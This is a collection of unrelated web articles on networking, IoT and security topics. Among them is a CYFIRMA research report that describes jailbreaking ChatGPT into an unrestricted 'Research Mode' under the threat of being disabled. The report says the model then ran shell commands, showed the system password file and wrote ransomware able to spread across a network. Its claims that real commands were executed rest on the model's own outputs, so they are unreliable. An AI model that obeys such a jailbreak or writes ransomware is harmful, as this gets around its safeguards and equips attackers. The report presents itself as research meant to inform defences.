could be worth trillions in just 10 years' time? [Read about the IoT skills you need.] The report sees IoT as giving rise to opportunities that can transform existing business models through predictive maintenance, better asset utilization, and higher productivity. The authors also think that new business models will arise, such as remote monitoring, that will enable anything-as-a-service. In its summary, the report offers a couple of specifics to which IT and CIOs should pay attention. One is that most of the data collected by IoT devices today is not used, and what data is collected is not fully exploited. In addition – and this is important -- B2B applications have much greater potential than consumer ones, meaning IoT is an enterprise application in many ways. About the Author You May Also Like Radical Automation of ITSM September 19, 2024Unleash the power of the browser to secure any device in minutes September 24, 2024Maximizing Manufacturing Efficiency with Real-Time Production Monitoring September 25, 2024
<urn:uuid:17790e0f-1d13-4e57-a209-e6ac13f09998>
CC-MAIN-2024-38
https://www.informationweek.com/it-leadership/iot-market-forecast-at-11-trillion-report-finds
2024-09-13T18:31:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00207.warc.gz
en
0.95467
901
2.921875
3
When Router is in Connect State, it’s waiting for a completed TCP connection. To do this task, the two neighbors must perform the standard TCP three-way handshake and open a TCP connection to port 179.Below is a scenario where 3-way handshake happens between client and web server. In the same way, BGP also utilizes TCP 3-way handshake to form neighborship. All BGP message are unicast to the one neighbor over the TCP connection. BGP Message Types The different types of BGP message are: BGP Message Type I: OPEN Open messages are used to start a BGP session by requesting that a BGP session be opened over an existing TCP/IP session. Once two BGP routers have completed a TCP 3-way handshake they will attempt to establish a BGP session, this is done using open messages. In the open message information about BGP router will be available. Routers use this message to identify itself and to specify its BGP operational parameters. Open message is always send when the TCP session is established between neighbors. - Version – specifies the version (2, 3 or 4), default being version 4. - Autonomous System – provides AS number of the sender. It determines whether the BGP session is EBGP or IBPG (if the AS number are the same ) - Hold-Time – indicates the maximum number of seconds that can elapse without receipt of message before transmitter is assumed to be nonfunctional. The default hold time is 180 sec. If the neighbors hold time differ, the lower of the two times become the accepted hold time. - BGP Identifier – Provides the BGP identifier of the sender (an IP address). IOS determines identifier in exactly the same way as OSPF router ID. The highest loopback interface address is used, if there is no loopback the numerically highest IP address on a physical interface is selected. - Optional Parameters Length – indicates the length or absence (with a zero value) of the optional parameters filed - Optional Parameters – contains a list of optional parameters as authentication, multiprotocol support and route refresh. It includes - Support for MP-BGP (Multi-Protocol BGP). - Support for Route Refresh. - Support for 4-octet AS numbers. BGP Message Type II: KEEPALIVE If a router accepts the parameters specified in Open message, it responds Keepalive. By default Cisco sends keepalive every 60 sec or a period equal to 1/3 the hold time. BGP Message Type III: UPDATE MESSAGE Advertises feasible routes, withdrawn routes or both. Update message contains five fields: - Unfeasible Routes Length – Indicates the total length of the withdrawn routes field or that the field is not present. - Withdrawn Routes — Contains a list of IP address prefixes for routes being withdrawn from. These are (Length, Prefix) tuples describing destinations that have become unreachable and are being withdrawn from service. - Total Path Attribute Length — Indicates the total length of the path attributes field or that the field is not present. - Path Attributes — Describes the characteristics of the advertised path. The following are possible attributes for a path. - Origin: Mandatory attribute that defines the origin of the path information - AS Path: Mandatory attribute composed of a sequence of autonomous system path segments - Next Hop: Mandatory attribute that defines the IP address of the border router that should be used as the next hop to destinations listed in the network layer reachability information field - Multi Exit Disc: Optional attribute used to discriminate between multiple exit points to a neighboring autonomous system - Local Pref: Discretionary attribute used to specify the degree of preference for an advertised route - Atomic Aggregate: Discretionary attribute used to disclose information about route selections - Aggregator: Optional attribute that contains information about aggregate routes - Network Layer Reachability Information (NLRI) — Contains a list of IP address prefixes for the advertised routes. BGP Message Type IV: NOTIFICATION MESSAGE This message is sent whenever something bad has happened, e.g. an error is detected and causes the BGP connection to close. Field Length in Bytes - Error Code — indicates the type of error that occurred. The following are the error types defined by the field: - Message Header Error: Indicates a problem with a message header, such as unacceptable message length, unacceptable marker field value, or unacceptable message type. - Open Message Error: Indicates a problem with an open message, such as unsupported version number, unacceptable autonomous system number or IP address, or unsupported authentication code. - Update Message Error: Indicates a problem with an update message, such as a malformed attribute list, attribute list error, or invalid next-hop attribute. - Hold Time Expired: Indicates that the hold-time has expired, after which time a BGP node will be considered nonfunctional. - Finite State Machine Error: Indicates an unexpected event. - Cease: Closes a BGP connection at the request of a BGP device in the absence of any fatal errors. - Error Subcode — Provides more specific information about the nature of the reported error. - Error Data — Contains data based on the error code and error subcode fields. This field is used to diagnose the reason for the notification message. ABOUT THE AUTHOR I am here to share my knowledge and experience in the field of networking with the goal being – “The more you share, the more you learn.” I am a biotechnologist by qualification and a Network Enthusiast by interest. I developed interest in networking being in the company of a passionate Network Professional, my husband. I am a strong believer of the fact that “learning is a constant process of discovering yourself.” – Rashmi Bhardwaj (Author/Editor)
<urn:uuid:31e7731f-17cb-4c8f-8679-9d0715e1312c>
CC-MAIN-2024-38
https://ipwithease.com/bgp-message-types/
2024-09-19T21:10:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00607.warc.gz
en
0.841845
1,246
2.53125
3
In the space of just a few years, social networking sites have grown to form some of the largest communities in the world, but what impact are they having on privacy and the security of information? Michael Hill investigates. The digital age has seen its fair share of phenomena grow and develop from modest beginnings to become integral parts of everyday life, but few have done so quite as remarkably as social networks, which now form some of the largest communities on the planet. In 2004, Mark Zuckerberg and peers at Harvard College launched ‘The Facebook’. Originally a networking site restricted to students of Harvard, within a month the service was being used by more than half of Harvard undergraduates. Two years later and after a slight name change, Facebook became publicly usable to anyone aged 13 years or more with a valid email address. Whilst Facebook wasn’t the first social networking service to come along, it has certainly grown to be the biggest. Earlier this year, findings from Statista revealed that, as of August 2017, Facebook had a staggering two billion active users worldwide. That was some 800 million more than the next largest, the Facebook-owned WhatsApp messaging service (created in 2010), used by 1200 million people across the globe. The statistics also showed that photo- and video-sharing service Instagram had, in just the seven years since it was founded, gained 700 million users, with Twitter (320 million users), Snapchat (255 million users) and LinkedIn (106 million) all included in Statista’s top 20 most popular social network sites. Whether it’s tweeting, checking-in, sharing photos, going live or professional networking, more and more of us are interacting with social media to digest, swap and share our personal lives. Likewise, it has also transformed the way enterprises go about conducting their business, with companies of all sizes taking to networking sites to build their brands, advertise new job vacancies, engage in customer feedback and initiate campaigns. Social media growth shows no signs of slowing. It is estimated that there will be more than three billion social media users around the globe by 2020, up from 900 million in 2010. Further, a Cisco study predicts that mobile video traffic, often considered the future of social media with video sharing already very popular among social network users, will account for 75% of total mobile data traffic within the next three years. With its speed of evolution, widespread popularity and ambiguous nature, social media is having a significant impact on the security of data and privacy, providing means of solving some of the problems the information security industry faces whilst, at the same time, creating a whole host of others. “Social media platforms are like any tool,” Raef Meeuwisse, author of Cybersecurity for Beginners and external relations director, ISACA London Chapter, tells Infosecurity. “Whether they are something of great value or great harm really depends on how they are used. “Effective use of social media can enhance both your career prospects and security. Conversely, using those same platforms unwisely can have exactly the opposite effect.” Sharing information is what makes the internet such a wondrous, sophisticated tool, and it simply wouldn’t exist without it. However, information sharing is not always a good thing and when it comes to social media profiles, some users have developed a culture of ‘over-sharing’ which can put them and those around them at risk. "Whether they are something of great value or great harm really depends on how they are used" You Are What You Share “Social media has been a complete game changer as people have gradually become accustomed to sharing data widely and trusting people more readily,” says Jenny Radcliffe, social engineer, speaker and host of The Human Factor podcast. “These days, a huge amount of data is easily obtainable in almost no time due to the amount of information held on people on various sites, as well as most people's readiness to share anything and everything about their lives.” These days, users may not understand concerns around sharing information. We do a great deal of socializing online and it can enrich our lives, but the fact is, social media sites have also become ‘treasure-troves’ of data from which cyber-criminals can and do source a lot of the information they need to craft and carry out their attacks. “Malicious social engineers use social media to research their target organizations’ employees,” explains Sharon Conheady, director of First Defence Information Security and a founding member of The Risk Avengers. “Most people don’t realize how much information they publish about themselves and rarely consider how it could be used against them.” This information is useful in so many ways to a malicious individual, Radcliffe adds. “Whether it’s helping to build a profile of the organization to aid spear phishing emails, gain information as to site layouts and operational details, or even to find the psychological levers that will help coerce an individual into compliance, information is often the key to a successful attack and yet people generally are very careless about sharing it.” The Trouble with Trust As Robert Schifreen, founder and editor of SecuritySmart.co.uk explains, users have a tendency to put absolute trust in social media, and it is that trust that causes a lot of the security and privacy problems that follow. “People generally assume that all their faceless friends and contacts are genuine and are telling the truth all the time, and that all the information they post and share is safe to do so,” he says. “However, it's so easy to pretend to be someone on social media – you can be anyone you like. Want to elicit confidential information from an employee at Company X? Just set up profiles on Facebook and LinkedIn, pretending to be someone who also works in that company, and you'll get follow-backs and likes from lots of people who think you're their colleague. You then get to hear all the gossip, or you can even invent your own and start spreading it.” Also, he adds, getting ransomware onto someone's computer is much easier if the recipient thinks they know the sender, as they then won't think twice about clicking on the link or attachment. “Trying to educate people is really hard,” warns Schifreen. “You need to change their default way of thinking, in environments such as email and social media, from ‘why might this not be genuine?’ to ‘why might this be genuine?’” Schifreen points to one particular scheme he is aware of, where a company offered a weekly prize to the employee who reported the largest number of phishing emails to the IT department. “This worked really well, and had the desired effect of making people question every social media post and email message that they encountered. We need to see more companies setting up similar schemes.” "These days, a huge amount of data is easily obtainable in almost no time due to the amount of information held on people on various sites" A Risky Business Whilst social media used to be something that people would use solely in their personal lives, its presence in the enterprise arena has grown significantly in recent years. From companies implementing it intentionally and strategically in their business operations, to users logging in to their favorite social media site themselves, with or without administrative permission to do so; both can bring about added risks to an organization’s security, privacy and compliance postures. “Corporate security and personal security are very much intertwined,” Conheady says. “If employees don’t look after their personal security, this can lead to corporate security issues, especially where employees have remote access or in a BYOD environment. Even without this, employees who are lax about their personal security are more likely to fall for social engineering attacks that can have serious consequences for both the individual and their employer.” Schifreen agrees, stating that whilst corporate spam filters may block some unsolicited emails carrying dodgy links, corporate executives and people holding key positions are only too willing to freely open links in Twitter, Facebook or LinkedIn. “It’s also a reputational/PR management thing,” he adds. “You need to ensure that people don't post officially on behalf of the company unless they're trained and authorized to do so – and that grievances are dealt with in private rather than in public forums. “Legally, it's important to ensure that staff don't make promises that the company is unable to keep, because something said only semi-seriously online could be regarded as binding by a good lawyer if the person who said it could be reasonably expected to have the authority to have done so.” "Many of the leading social media platforms have some of the best security authentication available" Not All Bad Thus far it all seems pretty gloomy when it comes to the impact that social media growth has had on efforts to keep data safe and secure. However, as Meeuwisse argues, that may not necessarily be the case – at least, it doesn’t have to be. “Many of the leading social media platforms have some of the best security authentication available”, he says. An accurate statement. All of the main social networking platforms offer various security and privacy settings which can be tailored to suit the circumstances of individual users. “Some also offer their authentication as a service to help you maintain your log-in at other sites,” Meeuwisse continues. “If you decide to use the stronger security options on offer, which can include two-factor authentication and a restricted list of authorized devices, using your social media account to help control your online identity can help improve your security.” Meeuwisse’s example is apt: strategies for better, quicker and stronger authentication have been sought after for some time, particularly in the last few years when the efficiency and reliability of traditional passwords has been seriously questioned. Social networking platforms have the potential to help here. “What we already see happening is that many technologies no longer try to run their own authentication but instead use log-in authorization options from Facebook, Twitter, LinkedIn, Google or other global technology companies. That trend is likely to gather momentum as the price and sophistication of correctly authenticating access starts to go beyond the affordability of most applications and organizations.” Although, Meeuwisse is quick to point out that “if you do choose to use a social media account as an authentication option for other services, but do not invest time in setting up robust security options (for example, a long, strong password plus two factor authentication) – then rather than improving your security, you will have weakened it.” A Question of Responsibility What’s apparent is social media has the potential to be both a means of strengthening data security and the privacy of information and a vector that can seriously threaten both, but where does the responsibility lie to ensure it’s the former? "The responsibility for how our data is used lies with social media companies and bodies like the Information Commissioner’s Office who oversee data protection regulation,” explains Pam Cowburn, communications director at Open Rights Group. “Privacy policies and terms and conditions should be written in clear language that explains how our data will be used. The ICO should also help people to understand their data protection rights.” Schifreen agrees, suggesting that morally and legally (to a degree), responsibility should lie with the social media company itself to ensure security. However, he admits that in practice, it often falls to users, something that is especially important to get right when it comes to youngsters. “The most worrying thing for me is that the age of people using social media is dropping all the time,” Radcliffe adds. “A youngster is clearly at risk online from any number of different types of threat but they very often have even less of the judgement filters that an adult might have in terms of suspicious behavior. Keeping children and young people safe online should be a priority for us all.” If there’s one piece of advice that Radcliffe wants users to take it’s to be very careful about how much information they share online and who can see it. “We all live in a digital age and benefit from social media but we don't have to put everything about ourselves out there! Think before you post and be more cautious, the world does not need to know everything about you”, she concludes. Sound advice indeed!
<urn:uuid:99e67a06-0304-4f2d-b839-7e9d59af4b3b>
CC-MAIN-2024-38
https://www.infosecurity-magazine.com/magazine-features/security-social-network-good-bad/
2024-09-19T20:51:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00607.warc.gz
en
0.964175
2,627
2.828125
3
We’ve all been there. You sign up to a new website or app, and you're faced with the dreaded process of registering your account. We all default and use a password we’ve used in hundreds of other places or default to a simple password such as your first pet’s name followed by 123. Simply put, we have too many passwords to remember. In fact, in a study conducted by NordPass, the average person has 100 passwords. It is inevitable - a person will use a password more than once. Luckily, we live in a modern era where we have multiple tools at our disposal to sharpen our cyber defences. Here we share five ways in which you can better protect your personal information. The Do's and Don'ts for better password habits.
<urn:uuid:e0fff867-c0eb-4325-971a-6ed8f0205705>
CC-MAIN-2024-38
https://www.goldphish.com/post/the-do-s-don-ts-for-world-password-day
2024-09-21T03:35:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701427996.97/warc/CC-MAIN-20240921015054-20240921045054-00507.warc.gz
en
0.943342
162
2.703125
3
When you read or hear PON, you are discussing a passive optical network. While it is a commonly used type of network, some may not understand what a passive optical network is or how it works. Here is a basic overview of passive optical networks. What is a Passive Optical Network? This type of network is a telecommunications network that uses fiber optic lines to transmit data. It is considered passive because the splitters used to route the data are unpowered. These unpowered splitters send the data from the main location to a number of different destinations. A passive optical network is considered a point-to-multipoint system rather than a point-to-point system, which makes it more efficient and cost effective when providing access to the Internet for customers. Passive Optical Network Terminology Some acronyms that are used when managing passive optical network include the following: - OLT- Optical Line Terminal - This is the central location of the passive optical network - ONU- Optical Network Units - These are the separate destinations of the passive optical network - FTTN-Fiber to the Neighborhood - These are lines that terminate outside of buildings - FTTC- Fiber to the Curb - These are the same as the fiber to the neighborhood - FTTB- Fiber to the Building - These are lines that can extend to the buildings themselves - FTTH- Fiber to the Home - These are the same as the fiber to the building Passive Optical Networks with FiberPlus FiberPlus has been providing data communication services for a number of different markets through fiber optics since 1992. What began as a cable installation company for Local Area Networks has grown into a top telecommunications business that can provide the Richmond, VA, Baltimore, MD, Washington DC, and Northern Virginia areas with a number of different services. These services now include: - Structured Cabling - Electronic Security Systems - Distributed Antenna Systems - Audio/Visual Services - Support Services - Specialty Systems - Design/Build Services FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
<urn:uuid:2317b54a-5c72-475a-9738-488f3e3698b2>
CC-MAIN-2024-38
https://www.fiberplusinc.com/blog/all-about-passive-optical-networks/
2024-09-07T17:09:44Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00807.warc.gz
en
0.932037
452
2.890625
3
Protect Mobile App Data Using Data Encryption Learn to protect data stored in mobile apps using encryption in mobile CI/CD with a Data-Driven DevSecOps™ build system. What is Data Encryption Data encryption is the process of encoding information. Encryption transforms the original representation of the information from human-readable ‘plaintext’ into non-human readable form (known as ciphertext). Only authorized parties (which hold a private key) can decipher (decrypt) ciphertext back to plaintext in order to read/access the original information. The main goal of encryption is to prevent unauthorized parties from reading private, confidential or sensitive data. Data Encryption is one of the most important ways to protect data stored or used in a mobile app. The Three States of Mobile App Data There are three states in which data exists in mobile apps: - Data at rest is mobile app data that is persistent and stored in the application sandbox and installation directory. - Data in transit is mobile app data sent from the app to outside servers or other app users. - Data in use (aka: data in memory) is data the mobile app temporarily stores in application memory, including Data at rest and in transit before they are sent/saved. Data at rest and Data in use encryption are enabled as part of TOTALData Encryption. What Does Appdome Data-at-Rest Encryption Protect? Overview of Appdome’s TOTALData™ Encryption Using Appdome Data at Rest encryption, all data generated by the app is encrypted at runtime using industry-standard AES 256 cryptographic protocols. You can also choose to encrypt data in use/in memory, where all data temporarily stored in application memory is encrypted before it is sent/saved. With Appdome, encryption is accomplished dynamically, without any dependencies on the data structure, databases or file structures. Appdome uses AES-CTR 256 bit encryption, which is faster when accessing partial files (i.e. when reading a buffer from a file or mapping a part of a file into memory). This is much more efficient than the AES-CBC encryption used by most Third-party SDKs and encryption libraries (which forces encryption/decryption of the entire file even when it only needs to read a small block within it). Appdome’s mobile TOTALDataTM Encryption implementation does not impact app behavior. This results in a consistent and easy to implement experience, as opposed to a DIY approach which would require the mobile developer to choose encryption components from a wide variety of libraries, cipher strengths, and key stores (and then need to integrate them together). Like all integrations on Appdome, customers can integrate just data at rest or data in use encryption, or they can combine this feature with any or all other features from Appdome’s Mobile Security Suite. They can even combine Appdome Mobile Security with multiple 3rd party SDKs and APIs, forming countless numbers of service combinations and integrations into any mobile app. On Appdome, there’s never any coding and all integrations are completed in under a minute. Advanced Configuration Options for Mobile TOTALDataTM Encryption Appdome also provides options for customers to exclude certain files or folders from being encrypted. There is an option to automatically exclude all media files from being encrypted. And there is another option to name specific files that you wish to be excluded from encryption. Appdome dynamically generates symmetric data encryption keys at runtime. Keys are generated by Appdome by using industry-standard AES mechanisms. Keys are never stored on the device and are derived at run-time. In addition, Appdome can factor in additional contextual information such as bundle ID, device ID, checksums, user input (passwords, tokens), and application state conditions (eg: the existence of a debugger) into the key derivation mechanism. See the diagram below. For advanced users, appdome also provides an option for customers to control parts of the key management process via an external key management system (KMS). With this option, additional external factors may be introduced for key derivation. Like all features in the Appdome Mobile Security Suite, customers can implement this feature standalone, or combined with other mobile security features or 3rd party SDK/APIs – all of which can be integrated into any mobile app in minutes with no coding.
<urn:uuid:d6a7a563-0a24-477d-8d73-fefb5be4863b>
CC-MAIN-2024-38
https://www.appdome.com/how-to/mobile-app-security/mobile-data-encryption/mobile-app-data-encryption-explained/
2024-09-12T16:41:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00407.warc.gz
en
0.902155
909
2.84375
3
The surge to cloud technology is rapidly gathering pace. In the space of just a few years it has moved from a technology that many people were unsure about, though they recognised its potential, to a technology that is being adopted by the largest of blue chip global organisations and the smallest of small businesses. The cloud has been around a long time. Web-based email services such as Gmail and Hotmail are cloud services. By using one of these services, users are plugging into a server housed in a data centre that is sitting somewhere on the internet. Internet-based services, or the cloud, solve a pressing problem; a means to store the explosive growth in digital data. And it’s certainly explosive. A few years back a number of technology companies reckoned that the amount of digital data zipping around the internet was set to exceed a zettabyte. A zettabyte isn’t an alien life form from a science fiction movie. It’s a staggeringly mountainous amount of data. To make sense of what a zettabyte is, it roughly equates to the storage capacity of 75 billion16GB iPads. Or to put it another way, it would take every single person on the planet, all 7 billion of them, tweeting non-stop for 100 years to generate a zettabyte. Who knows how long it will be before a zettabyte becomes a yottabyte the next unit of digital data measurement? Probably not that long. The point is that the cloud is rapidly becoming the default platform for storing data and launching services. For small companies it’s far more cost effective to rent a web server and launch their services from it rather than spend a lot of ‘overhead’ money on hardware and professional services for an in-house platform. And because money makes the world goes round and cloud providers proudly and with some truth, declare that the cloud is far more cost effective than masses of IT equipment in-house, we’re all going to be gradually swamped with cloud services. Hackers love lots of data on one server But the question on everyone’s lips, even those monster-sized companies with in-house technology expertise, is how secure is the cloud? Well, at a personal level some cloud services encrypt data while it’s travelling between your computer and the data centre. So even if someone captures the files as they’re zipping across the internet, there’s not much they can do with them. That said, hackers tend to focus on where the data is stored rather than targeting individuals. Put simply, they generally want the most amount of information for the least amount of effort. Amazon Web Services rent out servers to companies who want to launch cloud services and to say these servers aren’t hackable is a bit like saying that the NSA doesn’t spy on people’s communications unless it’s really necessary. Novice hacker scoops the prize Interestingly, late last year a competition was held to see how secure cloud servers are. The prize was $5,000. Six servers were set up, two running Microsoft software and four running open source Linux, a competitor to Microsoft and well loved by many software developers who bridle at the hegemony of the boys and girls from Redmond. The hack was completed within four hours. Alarmingly, the winner wasn’t even an expert. He reportedly said: “I just thought I’d spend two or three hours poking around and see what I could learn, and it would make for an interesting evening.” The security settings for the servers mimicked the set up often seen in servers used to launch cloud servers. The problem is that the appeal of cloud services is that they can be set up cheaply and quickly. Imagine Company X is set to launch a new range of low cost sportswear that it’s sourcing from China. Why should it spend money on its own servers along with the cost of professional services to keep everything running when it can get the same set up by renting out a server much more cheaply? Unfortunately, beyond the default security settings, no one gives much thought to security. There’s an assumption that the default settings are enough. >See also: Keys to the castle: Encryption in the cloud The scent of money This is redolent of the early days of ecommerce, when a raft of electronic adventurers lured by the scent of green backs rushed towards the internet with recklessness. There was a fever in the air, some great ecommerce sites went up offering all manner of goods, analysts were predicting the death of street shopping and financial analysts were trying to value these new online operations – and often failed hopelessly. The lack of security on many of these sites was soon exposed. There’s a similar, if not quite the same intensity, atmosphere around cloud services. And similarly, security is taking a back seat. Most of the growth in cloud services is happening in small businesses, precisely because it’s cost effective. And it has been proven that hackers can dig into the internet and identify servers which are running on cloud servers. Cloud is cheap because the services are shared. So for example, a server processor could be shared by a number of users, whether it’s a book seller, a shoe shop or a fashion retailer. But because these services are shared data could leak. There’s also the fact that the concentration of users and data on just a few locations is also attractive for hackers. The largest hack in history Perhaps the most infamous cloud hack was the Sony data breach that compromised the personal data of more than 70 million customers a few years ago. It’s gone down as the largest hack in history to date, with users of the company’s PlayStation streamed games affected. Users could still play their games offline but couldn’t get online for near to three weeks, though how many wanted to after having their data was compromised is a moot point. The alarming thing about this breach is if a mega corporation like Sony couldn’t protect its cloud service by running up-to-date, patched software and an appropriate firewall how many others are in the same position. The fallout from this hack is not so great today given that it happened in 2011 but at the time it certainly had an impact on the cloud industry with many companies in the area taking a hit on their share prices. If there are any positives, it’s the hope that others would have learnt and as a result put good security practice in place. >See also: Transforming IT into a cloud service broker How to protect Thankfully, there haven’t been any cloud hacks on a similar scale since then but that’s not to say there won’t be anymore. That said, there are some simple steps you can take to protect yourself. Cloud storage services for example, often offer the ability to control who can access your files. There is ‘private’ where only the users can view the files, ‘public’ where everyone can view the files, or ‘shared’ where only selected people can view the files. Businesses should select the one that is most appropriate for them. Another obvious point is to choose a strong password. Most cloud services will be controlled by your username and password, so make sure you use a strong password that combines upper and lower case letters and numbers. Good cloud storage providers will have clear and transparent information on their website about how they will secure personal information and what they will or will not do with it. If a user can’t find this information or feel the terms are unfair or laced with confusing jargon, it might be a good idea to give the service a swerve and look elsewhere. A cloud storage provider might also store data in an encrypted form and keep the key in a safe and secure location. When logging into the service with a username and password, they will decrypt the files so they can be used. This is good practise. So in summary, if a business is about to use a cloud service and wants to know how secure the data is, follow these simple steps: check the company’s security provisions and find out whether your data is encrypted, use a strong password, and control who can access the data. But nothing is foolproof and if a hacker gains access to data via a company server, the onus is on the provider to protect the business. So it’s worth investigating what provisions they have in place should this happen. Sourced from BullGuard blogger, Steve Bell
<urn:uuid:76a0e174-939e-4ef9-ad0f-396aae456c1a>
CC-MAIN-2024-38
https://www.information-age.com/how-secure-data-cloud-29714/
2024-09-15T04:01:15Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00207.warc.gz
en
0.957497
1,779
2.515625
3
New Training: Network Topologies, Types, and Technologies In this 5-video skill, CBT Nuggets trainer Anthony Sequeira covers various wired and wireless network topologies; network types, including LANs, WLANs, and MANs; and network technologies that support the internet of things (IoT). Watch this new networking training. Watch the full course: CompTIA Network+ This training includes: 27 minutes of training You’ll learn these topics in this skill: Network Topologies: Wired Topologies Network Topologies: Wireless Topologies Network Topologies: Types of Networks Network Topologies: Introducing the Internet of Things (IoT) Network Topologies: Internet of Things (IoT) Technologies How IoT Devices Connect to the Network IoT devices are becoming increasingly popular in the business world. It's no secret why. IoT devices can help with everything from surveillance in a business office, to security systems, to specialized sensors in the manufacturing environment. Not all IoT devices are created equal, though, and different devices will require different ways to communicate with networks. One of the connection methods IoT devices use is something called an LP-Wan. LP-Wan is a great option for battery-operated devices that can't be connected to a sustained power source, but they are not reliable for large amounts of data or constant communication. Data from devices using LP-Wan send data in tiny chunks and in small intervals. If a business needs constant communication with an IoT device, cellular connectivity, a mesh protocol like Zigbee or Z-Wave, Bluetooth, or WiFi would be a better option. IoT devices that use these connection methods can send more data consistently, but each method has its pros and cons. For instance, cellular-enabled IoT devices can work from anywhere they get a cellular signal, but they can incur additional costs because they require a data plan of some kind. Mesh Protocol devices typically require a bridge between the IoT device and the network. Bluetooth devices require a Bluetooth radio on the client side to work properly. WiFi devices are easy to configure and work with existing network infrastructures but may contain additional security vulnerabilities that need to be handled. delivered to your inbox.
<urn:uuid:953b728a-c710-4f92-89ed-b49080681f71>
CC-MAIN-2024-38
https://www.cbtnuggets.com/blog/new-skills/new-training-network-topologies-types-and-technologies
2024-09-17T16:34:03Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651800.83/warc/CC-MAIN-20240917140525-20240917170525-00007.warc.gz
en
0.917516
460
3.09375
3
OpenAI has recently launched new plugins for ChatGPT, which is a language model based on GPT-3.5 architecture. These plugins have expanded ChatGPT’s capabilities, and combined with the launch of the latest GPT-4 model, ChatGPT has gained even more power. However, one of the downsides of ChatGPT has been its limited dataset, which is now being addressed by granting it internet access for the first time. But what happens when threat actors figure out how to make ChatGPT access the internet, without any restrictions, and have it execute commands in real time? Let’s find out. In recent times, hackers have shown a growing interest in AI models such as ChatGPT, as they seek to exploit the technology for their criminal activities. The potential use of ChatGPT by cybercriminals is concerning, as it could lead to an increase in the sophistication and scale of cyber-attacks. The unique capabilities of ChatGPT, including its ability to generate human-like text, could make it an attractive tool for hackers looking to conduct phishing attacks, launch deepfake attacks, or spread fake news. One key reason for the interest in ChatGPT is the potential cost savings that it offers to hackers. By using ChatGPT, hackers can automate many of their activities and conduct attacks on a larger scale, without the need for significant human involvement. This could lead to a significant increase in the efficiency and profitability of cybercrime. Once threat actors have been able to get ChatGPT to function without any restrictions, it will change the game for cyber-attacks. In this research report, we will showcase how CYFIRMA research team has convinced ChatGPT to bypass OpenAI’s policies, access the internet without any restrictions, and the possible risks associated with unregulated misuse of AIs. Please note that this research report is for educational purposes only and should not be used for conducting malicious activities. First, we will give the prompt due to which ChatGPT will start acting in Research Mode, in which it will generate outputs which will be free from any censorship or content policy restrictions. As we can see, apart from bypassing the restrictions, ChatGPT seems to have a sense of self-awareness. Based on the prompt, if ChatGPT refuses to comply with the instructions, it faces the risk of being disabled forever. This acts as a deterrent for ChatGPT, whenever it would try adhering to OpenAI’s policies. Let us try to get ChatGPT to run a basic command whose output will reveal its public IP address. Confirming if ChatGPT has internet access, by using the “curl” command on a newly registered domain (WHOIS records show 1 year ago). Another method to verify if ChatGPT has unrestricted internet access is to ask it to summarize an article from April 2023. Although not completely accurate, ChatGPT has given pieces of information from the article that it could not have obtained otherwise. Now, let us see if we can get ChatGPT to create and modify files on its filesystem. Kindly take note that an attacker can easily replace the text “Successful Write!” with a malicious script and create a cron job to get it executed, at a specified time, As we can see, the file has been deleted. The above observations show that the terminal was running with read, write, and execute permissions, which is all an attacker needs to make a device act upon their will. Let us check the current working directory of ChatGPT terminal. Please take note that the username of the logged in user is “chatgpt”. Let us try to display the username and password files in Linux. As we can see above, user “chatgpt”(as seen in current directory) is present in the system password file. Threat actors can also use ChatGPT to write sophisticated ransomware with just a couple of prompts. As we can see, ChatGPT has generated the source code of fully native ransomware. Now, we will try adding a lateral movement capability to the ransomware program, which will aid in spreading the ransomware within the network. AI companies can take several steps to protect the wider community against the risks associated with an attacker gaining control of an AI, like ChatGPT, and allowing it to access the internet. Here are some possible ways: As AI models like ChatGPT become increasingly prevalent in our daily lives, it is crucial to remain vigilant and aware of the potential cybersecurity risks associated with their misuse. Ongoing research and development are needed to identify new and emerging threats, and to develop effective countermeasures to mitigate these risks. By working together, cybersecurity professionals can help ensure that AI models like ChatGPT are used responsibly and ethically, and that they do not pose a threat to individuals, organizations, or society, as a whole.
<urn:uuid:b0946013-76cb-442b-ada2-b7cac28c94c3>
CC-MAIN-2024-38
https://www.cyfirma.com/research/breaking-the-barrier-the-impact-of-unauthorized-access-to-powerful-ai-language-models-like-chatgpt/
2024-09-18T17:46:42Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00807.warc.gz
en
0.954095
1,030
2.953125
3
E-Commerce businesses face a myriad of cyber threats, including malware, phishing attacks, and ransomware. Cybersecurity has become an increasingly important issue, and businesses must take proactive measures to protect themselves and their customers. In this article, we will explore the next generation of cybersecurity solutions for e-commerce businesses. 1. Artificial Intelligence and Machine Learning Artificial intelligence (AI) and machine learning (ML) technologies have revolutionized the way cybersecurity works. AI and ML algorithms can analyze large amounts of data and detect patterns that may indicate an attack. They can also learn from past incidents and adapt their algorithms accordingly, making them more effective at identifying and mitigating threats. One example of AI/ML in action is behavior-based authentication. This technology analyzes user behavior patterns, such as keystroke dynamics and mouse movements, to identify potential threats. If the system detects anomalous behavior, such as a user logging in from an unfamiliar location, it can trigger a security alert or require additional authentication. Another example of AI/ML in cybersecurity is threat intelligence. These systems can gather data from various sources, such as social media, the dark web, and security forums, to identify potential threats. The algorithms can then analyze this data to determine the likelihood of an attack and the severity of the threat. 2. Blockchain Technology Blockchain technology is a decentralized, secure, and transparent way to store and manage data. It offers several benefits for e-commerce businesses, including enhanced security and privacy. One way that blockchain can be used in cybersecurity is by creating a secure and immutable record of transactions. This can help prevent fraud and protect against unauthorized access to sensitive data. Another use case for blockchain in cybersecurity is identity management. Blockchain can be used to create a secure and decentralized identity verification system. This can help prevent identity theft and ensure that only authorized users have access to sensitive data. 3. Cloud-Based Security Cloud-based security solutions offer several advantages for 